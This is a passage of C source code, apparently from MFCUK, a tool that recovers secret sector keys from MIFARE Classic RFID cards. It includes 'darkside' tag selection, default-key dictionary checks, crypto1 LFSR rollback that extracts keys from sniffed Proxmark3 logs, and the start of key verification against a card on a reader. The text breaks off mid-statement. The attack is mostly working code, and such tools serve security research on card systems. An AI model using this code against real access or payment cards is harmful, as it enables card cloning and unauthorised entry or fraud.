printf("---------------------------------------------------------------------\n");
if (IS_MIFARE_CLASSIC_1K(tag->amb->mbm.btUnknown)) {
max_blocks = MIFARE_CLASSIC_1K_MAX_BLOCKS;
} else {
max_blocks = MIFARE_CLASSIC_4K_MAX_BLOCKS;
}
for (i = 0; i < max_blocks; i++) {
trailer_block = get_trailer_block(bTagType, i);
if (!is_valid_block(bTagType, trailer_block)) {
break;
}
ptr_trailer = (mifare_classic_block_trailer *)((char *)tag + (trailer_block * MIFARE_CLASSIC_BYTES_PER_BLOCK));
printf("%d\t| %02x%02x%02x%02x%02x%02x\t| %c %c | %c %c\t| %02x%02x%02x%02x%02x%02x\t| %c %c | %c %c\n",
get_sector_for_block(bTagType, trailer_block),
ptr_trailer->abtKeyA[0], ptr_trailer->abtKeyA[1], ptr_trailer->abtKeyA[2],
ptr_trailer->abtKeyA[3], ptr_trailer->abtKeyA[4], ptr_trailer->abtKeyA[5],
(ptr_trailer->abtAccessBits[ACTIONS_KEY_A] & ACTIONS_VERIFY) ? 'V' : '.',
(ptr_trailer->abtAccessBits[ACTIONS_KEY_A] & ACTIONS_RECOVER) ? 'R' : '.',
(ptr_trailer->abtAccessBits[RESULTS_KEY_A] & ACTIONS_VERIFY) ? 'V' : '.',
(ptr_trailer->abtAccessBits[RESULTS_KEY_A] & ACTIONS_RECOVER) ? 'R' : '.',
ptr_trailer->abtKeyB[0], ptr_trailer->abtKeyB[1], ptr_trailer->abtKeyB[2],
ptr_trailer->abtKeyB[3], ptr_trailer->abtKeyB[4], ptr_trailer->abtKeyB[5],
(ptr_trailer->abtAccessBits[ACTIONS_KEY_B] & ACTIONS_VERIFY) ? 'V' : '.',
(ptr_trailer->abtAccessBits[ACTIONS_KEY_B] & ACTIONS_RECOVER) ? 'R' : '.',
(ptr_trailer->abtAccessBits[RESULTS_KEY_B] & ACTIONS_VERIFY) ? 'V' : '.',
(ptr_trailer->abtAccessBits[RESULTS_KEY_B] & ACTIONS_RECOVER) ? 'R' : '.'
);
// Go beyond current trailer block, i.e. go to next sector
i = trailer_block;
}
printf("\n");
return;
}
static bool mfcuk_darkside_reset_advanced(nfc_device *pnd)
{
if (0 > nfc_device_set_property_bool(pnd, NP_HANDLE_CRC, true)) {
//ERR("configuring NP_HANDLE_CRC");
//return false;
}
if (0 > nfc_device_set_property_bool(pnd, NP_HANDLE_PARITY, true)) {
//ERR("configuring NP_HANDLE_PARITY");
//return false;
}
return true;
}
static bool mfcuk_darkside_select_tag(nfc_device *pnd, int iSleepAtFieldOFF, int iSleepAfterFieldON, nfc_target_info *ti)
{
nfc_target ti_tmp;
if (!pnd || !ti) {
ERR("some parameter are NULL");
return false;
}
// Drop the field for a while, so the card can reset
if (0 > nfc_device_set_property_bool(pnd, NP_ACTIVATE_FIELD, false)) {
ERR("configuring NP_ACTIVATE_FIELD");
return false;
}
// {WPMCC09} 2.4. Tag nonces: "drop the field (for approximately 30us) to discharge all capacitors"
sleep(iSleepAtFieldOFF);
// Let the reader only try once to find a tag
if (0 > nfc_device_set_property_bool(pnd, NP_INFINITE_SELECT, false)) {
ERR("configuring NP_INFINITE_SELECT");
return false;
}
// Configure the CRC and Parity settings
if (0 > nfc_device_set_property_bool(pnd, NP_HANDLE_CRC, true)) {
ERR("configuring NP_HANDLE_CRC");
return false;
}
if (0 > nfc_device_set_property_bool(pnd, NP_HANDLE_PARITY, true)) {
ERR("configuring NP_HANDLE_PARITY");
return false;
}
// Enable field so more power consuming cards can power themselves up
if (0 > nfc_device_set_property_bool(pnd, NP_ACTIVATE_FIELD, true)) {
ERR("configuring NP_ACTIVATE_FIELD");
return false;
}
// Switch the field back on, and wait for a constant amount of time before authenticating
sleep(iSleepAfterFieldON);
// Poll for a ISO14443A (MIFARE) tag
if (0 >= nfc_initiator_select_passive_target(pnd, nmMifare, NULL, 0, &ti_tmp)) {
ERR("connecting to MIFARE Classic tag");
return false;
}
memcpy(ti, &ti_tmp, sizeof(ti_tmp));
return true;
}
int main(int argc, char *argv[])
{
// getopt related
int ch = 0;
char strOutputFilename[256] = {0}; // Initialize with '\0' character
//char extendedDescription[MFCUK_EXTENDED_DESCRIPTION_LENGTH] = {0}; // Initialize with '\0' character
uint8_t keyOpt[MIFARE_CLASSIC_KEY_BYTELENGTH] = {0};
uint8_t uidOpt[MIFARE_CLASSIC_UID_BYTELENGTH] = {0};
mifare_classic_block_trailer *ptr_trailer = NULL;
mifare_classic_block_trailer *ptr_trailer_dump = NULL;
int sector = 0;
uint32_t block = 0;
uint8_t action = 0;
uint8_t specific_key_type = 0;
uint8_t max_sectors = MIFARE_CLASSIC_4K_MAX_SECTORS;
// Defaults, can be overriden by -S and -s command line arguments
int iSleepAtFieldOFF = SLEEP_AT_FIELD_OFF; // modified with argument -S
int iSleepAfterFieldON = SLEEP_AFTER_FIELD_ON; // modified with argument -s
char *token = NULL;
const char *sep = ":";
char *str = NULL;
int iter = 0;
// libnfc related
nfc_context *context;
nfc_device *pnd;
nfc_target ti;
// mifare and crapto related
uint32_t uiErrCode = MFCUK_SUCCESS;
uint64_t ui64KeyRecovered;
mifare_classic_tag_ext dump_loaded_tag;
mifare_classic_tag_ext tag_on_reader;
mifare_classic_tag_ext tag_recover_verify;
// fingerprint options related
mifare_classic_tag finger_tag;
float finger_score;
float finger_score_highest;
int finger_index_highest;
// proxmark3 log related
#define PM3_UID 0
#define PM3_TAG_CHAL 1
#define PM3_NR_ENC 2
#define PM3_READER_RESP 3
#define PM3_TAG_RESP 4
#define PM3_MULTISECT_AUTH 5
uint32_t pm3_full_set_log[5]; // order is: uid, tag_challenge, nr_enc, reader_response, tag_response
uint32_t pm3_log_multisect_auth;
uint32_t pm3_ks2;
uint32_t pm3_ks3;
struct Crypto1State *pm3_revstate = NULL;
struct Crypto1State *pm3_revstate_multisect_auth = NULL;
uint64_t pm3_lfsr;
unsigned char *pm3_plfsr = (unsigned char *)&pm3_lfsr;
uint8_t pm3_log_multisect_decrypted[4];
uint8_t pm3_log_multisect_verified[4];
// various related
int i, j, k;
size_t st;
int numDefKeys = mfcuk_default_keys_num;
uint8_t (*current_default_keys)[MIFARE_CLASSIC_KEY_BYTELENGTH];
// At runtime, duplicate the mfcuk_default_keys[], and then add at it's bottom the default keys specified via -d command line options
if (!(current_default_keys = malloc(numDefKeys * MIFARE_CLASSIC_KEY_BYTELENGTH))) {
ERR("failed to allocate memory for current_default_keys");
return EXIT_FAILURE;
}
// Init the structs
memcpy(current_default_keys, mfcuk_default_keys, numDefKeys * MIFARE_CLASSIC_KEY_BYTELENGTH);
memset(&dump_loaded_tag, 0, sizeof(dump_loaded_tag));
memset(&tag_on_reader, 0, sizeof(tag_on_reader));
memset(&tag_recover_verify, 0, sizeof(tag_recover_verify));
tag_recover_verify.type = MIFARE_CLASSIC_4K;
tag_recover_verify.tag_basic.amb[0].mbm.btUnknown = MIFARE_CLASSIC_4K;
// "Sort-of" initializing the entries
memset((void *)arrSpoofEntries, 0, sizeof(arrSpoofEntries));
// MAIN ( broken-brain (: ) logic of the tool
// ---------------------------------------
clear_screen();
print_identification();
if (argc < 2) {
print_usage(stdout, argv[0]);
return EXIT_FAILURE;
}
// Load fingerprinting "database"
mfcuk_finger_load();
/*
if (mfcuk_finger_load() == 0)
{
ERR ("Unable to load any fingerprinting database.");
exit (EXIT_FAILURE);
}
*/
// OPTION PROCESSING BLOCK
// TODO: for WIN32 figure out how to use unistd/posix-compatible Gnu.Getopt.dll (http://getopt.codeplex.com)
// For WIN32 using VERY limited (modified) Xgetopt (http://www.codeproject.com/KB/cpp/xgetopt.aspx)
while ((ch = getopt(argc, argv, "htTDCi:I:o:O:V:R:S:s:v:M:U:d:n:P:p:F:")) != -1) { // -1 or EOF
switch (ch) {
// Name for the extended dump
case 'n':
strncpy(tag_recover_verify.description, optarg, sizeof(tag_recover_verify.description));
break;
case 'C':
bfOpts[ch] = true;
break;
// Additional default key option
case 'd':
memset(&keyOpt, 0, MIFARE_CLASSIC_KEY_BYTELENGTH);
if (strlen(optarg) != (MIFARE_CLASSIC_KEY_BYTELENGTH * 2)) {
// accept only 12 hex digits (fully qualified) Mifare Classic keys
WARN("invalid length key argument (%s)", optarg);
break;
}
for (st = 0; st < MIFARE_CLASSIC_KEY_BYTELENGTH; st++) {
if (!is_hex(optarg[2 * st]) || !is_hex(optarg[2 * st + 1])) {
// bad input hex string
WARN("invalid hex chars in key argument (%s)", optarg);
break;
}
keyOpt[st] = hex2bin(optarg[2 * st], optarg[2 * st + 1]);
}
// Increase number of keys
numDefKeys++;
// Also increase the memory to hold one more key. Hope not many keys will be specified,
// so realloc() will not impact performance and will not fragment memory
if (!(current_default_keys = realloc(current_default_keys, numDefKeys * MIFARE_CLASSIC_KEY_BYTELENGTH))) {
ERR("failed to reallocate memory for current_default_keys");
return EXIT_FAILURE;
}
memcpy(&(current_default_keys[numDefKeys - 1]), &keyOpt, MIFARE_CLASSIC_KEY_BYTELENGTH);
// Mark current option as specified (though not used in any checks)
bfOpts[ch] = true;
// Force the use of default keys
bfOpts['D'] = true;
break;
// Verbose option and level
case 'v':
if (!(i = atoi(optarg)) || (i < 1)) {
WARN("non-supported verbose-level value (%s)", optarg);
} else {
verboseLevel = i;
bfOpts[ch] = true;
}
break;
case 'M':
// Mifare Classic type option
if (!(i = atoi(optarg)) || (!IS_MIFARE_CLASSIC_1K(i) && !IS_MIFARE_CLASSIC_4K(i))) {
WARN("non-supported tag type value (%s)", optarg);
} else {
tag_recover_verify.type = i;
tag_recover_verify.tag_basic.amb[0].mbm.btUnknown = i;
bfOpts[ch] = true;
}
break;
case 'U':
// UID option
if (strlen(optarg) != (MIFARE_CLASSIC_UID_BYTELENGTH * 2)) {
// accept only 8 hex digits (fully qualified) Mifare Classic keys
WARN("invalid length UID argument (%s)", optarg);
break;
}
for (st = 0; st < MIFARE_CLASSIC_UID_BYTELENGTH; st++) {
if (!is_hex(optarg[2 * st]) || !is_hex(optarg[2 * st + 1])) {
// bad input hex string
WARN("invalid hex chars in key argument (%s)", optarg);
break;
}
uidOpt[st] = hex2bin(optarg[2 * st], optarg[2 * st + 1]);
}
if (st >= MIFARE_CLASSIC_UID_BYTELENGTH) {
tag_recover_verify.uid = bswap_32_pu8(uidOpt);
memcpy(tag_recover_verify.tag_basic.amb[0].mbm.abtUID, uidOpt, MIFARE_CLASSIC_UID_BYTELENGTH);
bfOpts[ch] = true;
}
break;
case 'S':
// Sleep for "AT FIELD OFF"
if (!(i = atoi(optarg)) || (i < 1) || (i > 10000)) {
WARN("non-supported sleep-AT-field OFF value (%s)", optarg);
} else {
iSleepAtFieldOFF = i;
bfOpts[ch] = true;
}
break;
case 's':
// Sleep for "AFTER FIELD ON"
if (!(i = atoi(optarg)) || (i < 1) || (i > 10000)) {
WARN("non-supported sleep-AFTER-field ON value (%s)", optarg);
} else {
iSleepAfterFieldON = i;
bfOpts[ch] = true;
}
break;
case 'D':
// Use DEFAULT KEYS for verification of sectors and key-types marked as ACTIONS_VERIFY
bfOpts[ch] = true;
break;
case 'R':
case 'V':
// Recover or Verify
action = (ch == 'R') ? ACTIONS_RECOVER : ACTIONS_VERIFY;
token = NULL;
str = optarg;
iter = 0;
while ((token = strtok(str, sep)) && (iter < 3)) {
switch (iter) {
// Here is the sector argument
case 0:
// BUG: if sector is 0, atoi() returns 0 (ok); if sector is non-numeric, atoi() returns also 0 (not-ok) - cannot differentiate
if (!(sector = atoi(token)) && (token[0] != '0')) {
WARN("non-numeric sector argument (%s)", token);
return EXIT_FAILURE;
}
// We don't know apriori whether loaded dump or the card on the reader is 1K or 4K, so assume validity for 4K
if ((sector != -1) && !is_valid_sector(MIFARE_CLASSIC_4K, sector)) {
WARN("invalid sector argument (%d)", sector);
return EXIT_FAILURE;
} else {
for (i = ((sector == -1) ? (0) : (sector)); i < ((sector == -1) ? (MIFARE_CLASSIC_4K_MAX_SECTORS) : (sector + 1)); i++) {
// TODO: proper error handling for block and ptr_trailer
block = get_trailer_block_for_sector(MIFARE_CLASSIC_4K, i);
ptr_trailer = (mifare_classic_block_trailer *)((char *)(&tag_recover_verify.tag_basic) + (block * MIFARE_CLASSIC_BYTES_PER_BLOCK));
ptr_trailer->abtAccessBits[ACTIONS_KEY_A] |= action;
ptr_trailer->abtAccessBits[ACTIONS_KEY_B] |= action;
}
}
break;
// Here is the key-type argument
// after case 0, we can assume sector is a safe and valid sector
case 1:
switch (token[0]) {
case 'A':
case 'B':
specific_key_type = keyA + (token[0] - 'A');
// Invalidate all the opposite keys
for (i = ((sector == -1) ? (0) : (sector)); i < ((sector == -1) ? (MIFARE_CLASSIC_4K_MAX_SECTORS) : (sector + 1)); i++) {
// TODO: proper error handling for block and ptr_trailer
block = get_trailer_block_for_sector(MIFARE_CLASSIC_4K, i);
ptr_trailer = (mifare_classic_block_trailer *)((char *)(&tag_recover_verify.tag_basic) + (block * MIFARE_CLASSIC_BYTES_PER_BLOCK));
ptr_trailer->abtAccessBits[ACTIONS_KEY_B * (1 - (token[0] - 'A'))] &= (~action);
}
break;
default:
specific_key_type = 0;
// Validate all the key-types
for (i = ((sector == -1) ? (0) : (sector)); i < ((sector == -1) ? (MIFARE_CLASSIC_4K_MAX_SECTORS) : (sector + 1)); i++) {
// TODO: proper error handling for block and ptr_trailer
block = get_trailer_block_for_sector(MIFARE_CLASSIC_4K, i);
ptr_trailer = (mifare_classic_block_trailer *)((char *)(&tag_recover_verify.tag_basic) + (block * MIFARE_CLASSIC_BYTES_PER_BLOCK));
ptr_trailer->abtAccessBits[ACTIONS_KEY_A] |= action;
ptr_trailer->abtAccessBits[ACTIONS_KEY_B] |= action;
}
break;
}
break;
// Here is the key argument
// after case 0, we can assume sector is a safe and valid sector
case 2:
// Recovery does not need a key
if (ch == 'R') {
break;
}
memset(&keyOpt, 0, MIFARE_CLASSIC_KEY_BYTELENGTH);
if (strlen(token) != (MIFARE_CLASSIC_KEY_BYTELENGTH * 2)) {
// accept only 12 hex digits (fully qualified) Mifare Classic keys
WARN("invalid length key argument (%s)", token);
break;
}
for (st = 0; st < MIFARE_CLASSIC_KEY_BYTELENGTH; st++) {
if (!is_hex(token[2 * st]) || !is_hex(token[2 * st + 1])) {
// bad input hex string
WARN("invalid hex chars in key argument (%s)", token);
break;
}
keyOpt[st] = hex2bin(token[2 * st], token[2 * st + 1]);
}
for (i = ((sector == -1) ? (0) : (sector)); i < ((sector == -1) ? (MIFARE_CLASSIC_4K_MAX_SECTORS) : (sector + 1)); i++) {
// TODO: proper error handling for block and ptr_trailer
block = get_trailer_block_for_sector(MIFARE_CLASSIC_4K, i);
ptr_trailer = (mifare_classic_block_trailer *)((char *)(&tag_recover_verify.tag_basic) + (block * MIFARE_CLASSIC_BYTES_PER_BLOCK));
if (!specific_key_type || specific_key_type == keyA) {
memcpy(&(ptr_trailer->abtKeyA[0]), keyOpt, sizeof(keyOpt));
ptr_trailer->abtAccessBits[ACTIONS_KEY_A] |= ACTIONS_KEYSET;
}
if (!specific_key_type || specific_key_type == keyB) {
memcpy(&(ptr_trailer->abtKeyB[0]), keyOpt, sizeof(keyOpt));
ptr_trailer->abtAccessBits[ACTIONS_KEY_B] |= ACTIONS_KEYSET;
}
}
break;
// We do not support any other arguments for now for -R/-V option
default:
break;
}
str = NULL;
iter++;
}
break;
case 'i':
// Input simple dump file of type mifare_classic_tag, Options i and I are autoexclusive
if (!bfOpts['i'] && !bfOpts['I']) {
if (!mfcuk_load_tag_dump(optarg, &(dump_loaded_tag.tag_basic))) {
WARN("Unable to load tag dump from '%s'", optarg);
} else {
bfOpts[ch] = true;
}
}
break;
case 'I':
// Input extended dump file of type mifare_classic_tag_ext, Options i and I are autoexclusive
if (!bfOpts['i'] && !bfOpts['I']) {
if (!mfcuk_load_tag_dump_ext(optarg, &(dump_loaded_tag))) {
WARN("Unable to load tag dump from '%s'", optarg);
} else {
bfOpts[ch] = true;
}
}
break;
case 'o':
case 'O':
// Output simple/extended dump file, Options o and O are autoexclusive
if (!bfOpts['o'] && !bfOpts['O']) {
strncpy(strOutputFilename, optarg, sizeof(strOutputFilename));
bfOpts[ch] = true;
}
break;
// Run just test-cases for verifying the correctnes of is_ and get_ block/sector functions
case 't':
// Requested test of Mifare Classic 1K Blocks and Sectors functionality
test_mifare_classic_blocks_sectors_functions(MIFARE_CLASSIC_1K);
bfOpts[ch] = true;
break;
case 'T':
// Requested test of Mifare Classic 4K Blocks and Sectors functionality
test_mifare_classic_blocks_sectors_functions(MIFARE_CLASSIC_4K);
bfOpts[ch] = true;
break;
case 'P':
token = NULL;
str = optarg;
iter = 0;
// parse the arguments of the option. ugly, ugly... i know :-S
while ((token = strtok(str, sep)) && (iter < (int)(sizeof(pm3_full_set_log) / sizeof(pm3_full_set_log[0])))) {
str = NULL;
errno = 0;
pm3_full_set_log[iter] = strtoul(token, NULL, 16);
// strtoul failed somewhere. WTF?! strtoul() is not properly setting errno... errrrrggh!
if (errno != 0) {
WARN("Invalid hex literal %s for option -P at position %d", optarg, iter);
}
iter++;
}
// if not all arguments were fine, fire warning
if (iter != sizeof(pm3_full_set_log) / sizeof(pm3_full_set_log[0])) {
WARN("Invalid number of hex literal for option -P");
}
// otherwise try to recover
else {
/*
// TODO: implement better this function
mfcuk_get_key_from_full_state(pm3_full_set, &ui64_lsfr);
*/
pm3_ks2 = pm3_full_set_log[PM3_READER_RESP] ^ prng_successor(pm3_full_set_log[PM3_TAG_CHAL], 64);
pm3_ks3 = pm3_full_set_log[PM3_TAG_RESP] ^ prng_successor(pm3_full_set_log[PM3_TAG_CHAL], 96);
pm3_revstate = lfsr_recovery64(pm3_ks2, pm3_ks3);
lfsr_rollback_word(pm3_revstate, 0, 0);
lfsr_rollback_word(pm3_revstate, 0, 0);
lfsr_rollback_word(pm3_revstate, pm3_full_set_log[PM3_NR_ENC], 1);
lfsr_rollback_word(pm3_revstate, pm3_full_set_log[PM3_UID] ^ pm3_full_set_log[PM3_TAG_CHAL], 0);
crypto1_get_lfsr(pm3_revstate, &pm3_lfsr);
printf("proxmark3 log key: %02x%02x%02x%02x%02x%02x\n", pm3_plfsr[5], pm3_plfsr[4], pm3_plfsr[3], pm3_plfsr[2], pm3_plfsr[1], pm3_plfsr[0]);
crypto1_destroy(pm3_revstate);
// If all minimum required details from the log were parsed and still there are some more hex tokens, it might be a multi-sector authentication test request
if (token) {
errno = 0;
pm3_log_multisect_auth = strtoul(token, NULL, 16);
// strtoul failed somewhere. WTF?! strtoul() is not properly setting errno... errrrrggh!
if (errno != 0) {
WARN("Invalid hex literal %s for option -P at position %d", optarg, iter);
} else {
// TODO: what if the multi-sect authentication comes not directly after the first successful plain authentication, i.e. several read/write/incr/decr command occur first then multi-sect auth?! how does this affects the crypto stream/state, what should we do? need to simulate with a nfc-multisect-auth program which has tests with interleaved multi-sect authentications
pm3_revstate_multisect_auth = lfsr_recovery64(pm3_ks2, pm3_ks3);
for (i = 0; i < 4; i++) {
uint8_t multisect_auth_byte = (pm3_log_multisect_auth >> (8 * (3 - i))) & 0xFF;
pm3_log_multisect_decrypted[i] = crypto1_byte(pm3_revstate_multisect_auth, 0x00, 0) ^ multisect_auth_byte;
pm3_log_multisect_verified[i] = pm3_log_multisect_decrypted[i];
}
// TODO: This "<= MIFARE_CLASSIC_4K_MAX_BLOCKS" should be properly checked against either MIFARE_CLASSIC_1K_MAX_BLOCKS or MIFARE_CLASSIC_4K_MAX_BLOCKS (depending on card type detected)
if ((pm3_log_multisect_decrypted[0] == MC_AUTH_A) || (pm3_log_multisect_decrypted[0] == MC_AUTH_B)) {
iso14443a_crc_append(pm3_log_multisect_verified, 2);
int multisect_auth_verified = 1;
for (i = 0; i < 4; i++) {
if (pm3_log_multisect_verified[i] != pm3_log_multisect_decrypted[i]) {
multisect_auth_verified = 0;
break;
}
}
printf("proxmark3 log multi-sect auth detected: %02X %02X %02X %02X (parity crc %s)\n", pm3_log_multisect_decrypted[0], pm3_log_multisect_decrypted[1], pm3_log_multisect_decrypted[2], pm3_log_multisect_decrypted[3], multisect_auth_verified ? "ok" : "NOK");
}
crypto1_destroy(pm3_revstate_multisect_auth);
}
}
}
break;
case 'p':
/*
if (mfcuk_pm3_parse_log(optarg, pm3_full_set))
{
mfcuk_get_key_from_full_state(pm3_full_set, &ui64_lsfr);
}
else
{
}
*/
printf("NOT IMPLEMENTED YET...\n");
break;
case 'F':
if (!mfcuk_load_tag_dump(optarg, &(finger_tag))) {
WARN("Unable to load tag dump from '%s'", optarg);
} else {
finger_score_highest = -1.0f;
finger_index_highest = -1;
for (i = 0; i < mfcuk_finger_db_entries; i++) {
finger_score = -1.0f;
mfcuk_finger_db[i].tmpl_comparison_func(&(finger_tag), mfcuk_finger_db[i].tmpl_data, &finger_score);
if (finger_score > finger_score_highest) {
finger_score_highest = finger_score;
finger_index_highest = i;
}
}
if (finger_index_highest > -1) {
printf("Tag '%s' matches '%s' with highest score %f\n", optarg, mfcuk_finger_db[finger_index_highest].tmpl_name, finger_score_highest);
mfcuk_finger_db[finger_index_highest].tmpl_decoder_func(&(finger_tag));
} else {
printf("No template found to match tag '%s'\n", optarg);
}
}
break;
case 'h':
// Help screen
print_usage(stdout, argv[0]);
return EXIT_SUCCESS;
break;
case '?':
default:
// Help screen, on error output
ERR("Unknown option %c\n", ch);
print_usage(stderr, argv[0]);
return EXIT_FAILURE;
break;
}
}
// Unload fingerprinting
mfcuk_finger_unload();
// If tests were requested, exit after tests completed
if (bfOpts['t'] || bfOpts['T']) {
return EXIT_SUCCESS;
}
// In case default keys requested (and maybe more specified on command line),
// print the default keys which will be used
if (bfOpts['D']) {
if (bfOpts['v'] && (verboseLevel > 0)) {
printf("DEFAULT KEYS:\n");
// Skip the key at index 0, since it is initially 0x0 and is reserved for the loaded dump key
for (i = 1; i < numDefKeys; i++) {
printf("\t");
print_hex(current_default_keys[i], MIFARE_CLASSIC_KEY_BYTELENGTH);
}
}
}
if (bfOpts['i'] || bfOpts['I']) {
if (bfOpts['v'] && (verboseLevel > 0)) {
print_mifare_classic_tag_keys("LOADED TAG DUMP", &(dump_loaded_tag.tag_basic));
}
// Overwrite from the loaded dump only the keys for sectors and keys which were not specified on command line
for (i = 0; i < MIFARE_CLASSIC_4K_MAX_SECTORS; i++) {
// TODO: proper error handling for block and ptr_trailer
block = get_trailer_block_for_sector(MIFARE_CLASSIC_4K, i);
ptr_trailer = (mifare_classic_block_trailer *)((char *)(&tag_recover_verify.tag_basic) + (block * MIFARE_CLASSIC_BYTES_PER_BLOCK));
ptr_trailer_dump = (mifare_classic_block_trailer *)((char *)(&dump_loaded_tag.tag_basic) + (block * MIFARE_CLASSIC_BYTES_PER_BLOCK));
// If no command line keyA is set, copy from loaded dump
if (!(ptr_trailer->abtAccessBits[ACTIONS_KEY_A] & ACTIONS_KEYSET)) {
memcpy(&(ptr_trailer->abtKeyA[0]), &(ptr_trailer_dump->abtKeyA[0]), MIFARE_CLASSIC_KEY_BYTELENGTH);
// TODO: think if to make this sector ACTIONS_KEYSET or introduce a new value ACTIONS_KEYLOAD
}
// If no command line keyB is set, copy from loaded dump
if (!(ptr_trailer->abtAccessBits[ACTIONS_KEY_B] & ACTIONS_KEYSET)) {
memcpy(&(ptr_trailer->abtKeyB[0]), &(ptr_trailer_dump->abtKeyB[0]), MIFARE_CLASSIC_KEY_BYTELENGTH);
// TODO: think if to make this sector ACTIONS_KEYSET or introduce a new value ACTIONS_KEYLOAD
}
}
// If no command line UID supplied and not tag-type specified, copy the manufacturer block from the loaded dump
if (!bfOpts['U'] && !bfOpts['M']) {
ptr_trailer = (mifare_classic_block_trailer *)((char *)(&tag_recover_verify.tag_basic) + (0 * MIFARE_CLASSIC_BYTES_PER_BLOCK));
ptr_trailer_dump = (mifare_classic_block_trailer *)((char *)(&dump_loaded_tag.tag_basic) + (0 * MIFARE_CLASSIC_BYTES_PER_BLOCK));
memcpy(ptr_trailer, ptr_trailer_dump, sizeof(*ptr_trailer));
tag_recover_verify.type = tag_recover_verify.tag_basic.amb[0].mbm.btUnknown;
tag_recover_verify.uid = bswap_32_pu8(tag_recover_verify.tag_basic.amb[0].mbm.abtUID);
}
}
if (!bfOpts['C']) {
printf("No connection to reader requested (need option -C). Exiting...\n");
return EXIT_SUCCESS;
}
// READER INITIALIZATION BLOCK
// Try to open the NFC reader
nfc_init(&context);
pnd = nfc_open(context, NULL);
if (pnd == NULL) {
ERR("connecting to NFC reader");
goto error;
}
if (0 > nfc_initiator_init(pnd)) {
ERR("initializing NFC reader: %s", nfc_device_get_name(pnd));
goto error;
}
printf("\nINFO: Connected to NFC reader: %s\n\n", nfc_device_get_name(pnd));
// Select tag and get tag info
if (!mfcuk_darkside_select_tag(pnd, iSleepAtFieldOFF, iSleepAfterFieldON, &ti.nti)) {
ERR("selecting tag on the reader %s", nfc_device_get_name(pnd));
goto error;
}
mfcuk_darkside_reset_advanced(pnd);
// Tag on the reader type
tag_on_reader.type = ti.nti.nai.btSak;
tag_on_reader.tag_basic.amb[0].mbm.btUnknown = ti.nti.nai.btSak;
// No command line tag type specified, take it from the tag on the reader
if (!bfOpts['M']) {
tag_recover_verify.type = ti.nti.nai.btSak;
tag_recover_verify.tag_basic.amb[0].mbm.btUnknown = ti.nti.nai.btSak;
}
// Tag on the reader UID
tag_on_reader.uid = bswap_32_pu8(ti.nti.nai.abtUid);
memcpy(tag_on_reader.tag_basic.amb[0].mbm.abtUID, ti.nti.nai.abtUid, MIFARE_CLASSIC_UID_BYTELENGTH);
// No command line tag UID specified, take it from the tag on the reader
if (!bfOpts['U']) {
tag_recover_verify.uid = bswap_32_pu8(ti.nti.nai.abtUid);
memcpy(tag_recover_verify.tag_basic.amb[0].mbm.abtUID, ti.nti.nai.abtUid, MIFARE_CLASSIC_UID_BYTELENGTH);
}
if (bfOpts['v'] && (verboseLevel > 0)) {
print_mifare_classic_tag_actions("\n\nINITIAL ACTIONS MATRIX", &(tag_recover_verify.tag_basic));
}
max_sectors = (IS_MIFARE_CLASSIC_1K(tag_recover_verify.type) ? MIFARE_CLASSIC_1K_MAX_SECTORS : MIFARE_CLASSIC_4K_MAX_SECTORS);
// VERIFY KEYS CODE-BLOCK
printf("\nVERIFY: ");
for (k = keyA; k <= keyB; k++) {
// Print key-type for which we are looping the sectors for verification
printf("\n\tKey %c sectors:", 'B' - (keyB - k));
for (i = 0; i < max_sectors; i++) {
uint64_t crntVerifKey = 0;
uint8_t crntVerifTagType = tag_recover_verify.type;
int crntNumVerifKeys = (bfOpts['D']) ? (numDefKeys) : (1);
mifare_param mp;
// Depending on which of keyA or keyB the j value is, the checks and actions below will address exactly that keyA or keyB of current sector
uint8_t action_byte = ACTIONS_KEY_A + 2 * (1 - (keyB - k));
uint8_t result_byte = RESULTS_KEY_A + 2 * (1 - (keyB - k));
printf(" %x", i);
fflush(stdout);
// TODO: proper error handling
block = get_trailer_block_for_sector(crntVerifTagType, i);
ptr_trailer = (mifare_classic_block_trailer *)((char *)(&tag_recover_verify.tag_basic) + (block * MIFARE_CLASSIC_BYTES_PER_BLOCK));
// If DEFAULT KEYS option was specified, crntNumVerifKeys is already taking care of them
// Also, perform verification ontly if the sector has been marked for verification of key and not valid verification yet occured in the loop
for (j = 0; (j < crntNumVerifKeys) && (ptr_trailer->abtAccessBits[action_byte] & ACTIONS_VERIFY) && !(ptr_trailer->abtAccessBits[result_byte] & ACTIONS_VERIFY); j++) {
// TODO: think of proper mechanism. this is temporary workaround in cases when reader hangs
mfcuk_save_tag_dump("./snapshot.mfd", &(tag_recover_verify.tag_basic));
// The first spot in the current_default_keys, is reserved to the key from the loaded dump or from command line
// If not present (dump or command line), the key of this key-type k for current sector i will be 000000000000
if (j == 0) {
memcpy(&(current_default_keys[0][0]), (k == keyA) ? (&(ptr_trailer->abtKeyA[0])) : ((&(ptr_trailer->abtKeyB[0]))), MIFARE_CLASSIC_KEY_BYTELENGTH);
}
if (!mfcuk_key_arr_to_uint64(&(current_default_keys[j][0]), &crntVerifKey)) {
WARN("mfcuk_key_arr_to_uint64() failed, verification key will be %012"PRIx64"", crntVerifKey);
}
/*
// TODO: make this kind of key verification as part of option -a - advanced verification of keys with crapto1 rollback for double verification
// TEST
nfc_disconnect(pnd);
// Try to open the NFC reader
pnd = nfc_connect(NULL);
if (pnd == NULL)
{
ERR("connecting to NFC reader");
return 1;
}
if ( 0 > nfc_initiator_init(pnd) )
{
ERR("initializing NFC reader: %s", nfc_device_get_name(pnd));
nfc_disconnect(pnd);
return 1;
}
// TEST
uiErrCode = mfcuk_verify_key_block(pnd, crntVerifUID, crntVerifKey, k, crntVerifTagType, block);
if ( uiErrCode == MFCUK_SUCCESS )
{
// Mark current key-type as verified
ptr_trailer->abtAccessBits[result_byte] |= ACTIONS_VERIFY;
// Copy default key on top of dump only in case default keys option was specified in command line and the default key matched
memcpy( (k==keyA)?(ptr_trailer->abtKeyA):(ptr_trailer->abtKeyB), current_default_keys[j], MIFARE_CLASSIC_KEY_BYTELENGTH);
}
else
{
ERR("AUTH sector %d, block %d, key %012"PRIx64", key-type 0x%02x, error code 0x%02x", i, block, crntVerifKey, k, uiErrCode);
}
// Reset advanced settings
mfcuk_darkside_reset_advanced(pnd);
*/
memcpy(mp.mpa.abtAuthUid, tag_recover_verify.tag_basic.amb[0].mbm.abtUID, MIFARE_CLASSIC_UID_BYTELENGTH);
memcpy(mp.mpa.abtKey, &(current_default_keys[j][0]), MIFARE_CLASSIC_KEY_BYTELENGTH);
if (0 >= nfc_initiator_select_passive_target(pnd, nmMifare, NULL, 0, &ti)) {
ERR("tag was removed or cannot be selected");
}
if (0 > nfc_initiator_mifare_cmd(pnd, k, block, &mp)) {
